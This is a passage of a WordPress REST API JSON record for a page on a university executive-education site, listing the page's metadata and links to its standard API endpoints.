[&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":36,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-10084","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/10084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=10084"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/10084\/revisions"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=10084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}